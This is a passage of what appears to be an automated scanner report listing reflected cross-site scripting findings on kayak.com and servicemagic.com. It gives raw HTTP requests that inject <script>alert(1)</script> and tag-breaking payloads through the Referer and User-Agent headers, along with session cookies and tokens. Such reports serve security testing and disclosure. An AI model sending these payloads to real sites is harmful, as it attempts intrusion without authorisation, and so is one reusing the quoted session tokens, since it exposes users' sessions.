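A client that stops at the 302 would wrongly conclude that `/in` does not reflect the header; a browser, which follows the redirect automatically, lands on the page where the script runs. When scripting the check, compare the final body, and keep a hop limit so a misconfigured endpoint that redirects to itself cannot hang the scan.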
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 27aab<script>alert(1)</script>33f2cc57ae0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=27aab<script>alert(1)</script>33f2cc57ae0
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c596c<script>alert(1)</script>a8d5e12a312 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/jsresults HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c596c<script>alert(1)</script>a8d5e12a312
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 38334<script>alert(1)</script>4e39f207cf6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/qrystat HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38334<script>alert(1)</script>4e39f207cf6
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload cad22<script>alert(1)</script>aee2165ce3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/air HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=cad22<script>alert(1)</script>aee2165ce3d
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c8ef9<script>alert(1)</script>abfc3092c11 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/car HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=c8ef9<script>alert(1)</script>abfc3092c11
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8c6ae<script>alert(1)</script>cce32a6a65b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/hotel HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=8c6ae<script>alert(1)</script>cce32a6a65b
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload edeff<script>alert(1)</script>fc9e772a42c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/sparkle HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)edeff<script>alert(1)</script>fc9e772a42c
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 270ba<script>alert(1)</script>a1151bfba5c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/car/ms/19 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)270ba<script>alert(1)</script>a1151bfba5c
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 42483<script>alert(1)</script>500cb5f5695 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/flight/ms/264 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)42483<script>alert(1)</script>500cb5f5695
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 29c69<script>alert(1)</script>acae3436257 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/final%20results/hotel/ms/407 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29c69<script>alert(1)</script>acae3436257
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 12e29<script>alert(1)</script>e25ef676ba4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/cars/ms/281 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12e29<script>alert(1)</script>e25ef676ba4
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e379e<script>alert(1)</script>736a3e83ed9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/flights/ms/332 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e379e<script>alert(1)</script>736a3e83ed9
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 2589f<script>alert(1)</script>56e66f656a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/311 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2589f<script>alert(1)</script>56e66f656a
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 9b4c3<script>alert(1)</script>d3fe1999a52 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/378 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9b4c3<script>alert(1)</script>d3fe1999a52
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload d108a<script>alert(1)</script>2c18a6b7fab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/408 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d108a<script>alert(1)</script>2c18a6b7fab
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c1727<script>alert(1)</script>e2be0b58233 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/545 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c1727<script>alert(1)</script>e2be0b58233
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a97a7<script>alert(1)</script>3a64d78464a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/vacations/ms/1511 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a97a7<script>alert(1)</script>3a64d78464a
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 90fb4<script>alert(1)</script>d32fb994530 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/vacations/ms/237 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90fb4<script>alert(1)</script>d32fb994530
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 669e4<script>alert(1)</script>d80a078640d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that used client-side technologies such as Flash to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/deals_fd_seeall HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)669e4<script>alert(1)</script>d80a078640d
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eccf3"><a>1c7543510d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that used client-side technologies such as Flash to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /k/ident/register HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=eccf3"><a>1c7543510d8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52674"><a>4ad5655037d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that used client-side technologies such as Flash to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /k/ident/signin HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=52674"><a>4ad5655037d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a9b8"><script>alert(1)</script>792e32b1d0d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that used client-side technologies such as Flash to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.servicemagic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a9b8"><script>alert(1)</script>792e32b1d0d
Response
HTTP/1.0 200 OK
Set-Cookie: ServerID=1238; path=/
Date: Sun, 12 Dec 2010 15:45:36 GMT
Server: Apache/2
Set-Cookie: JSESSIONID=B12B811ED4F8BD4F1B22CBCF8292D360.workerpr038-1; Path=/
Set-Cookie: psacn=; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/
Set-Cookie: csdcn=1292168736064; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/
Set-Cookie: originatingSessionID=1292168736064pwspr038B12B811ED4F8BD4F1B22CBCF8292D360.workerpr038-1; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/
Set-Cookie: psdcn=0; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/
Set-Cookie: csacn=746971; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/
P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV'
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
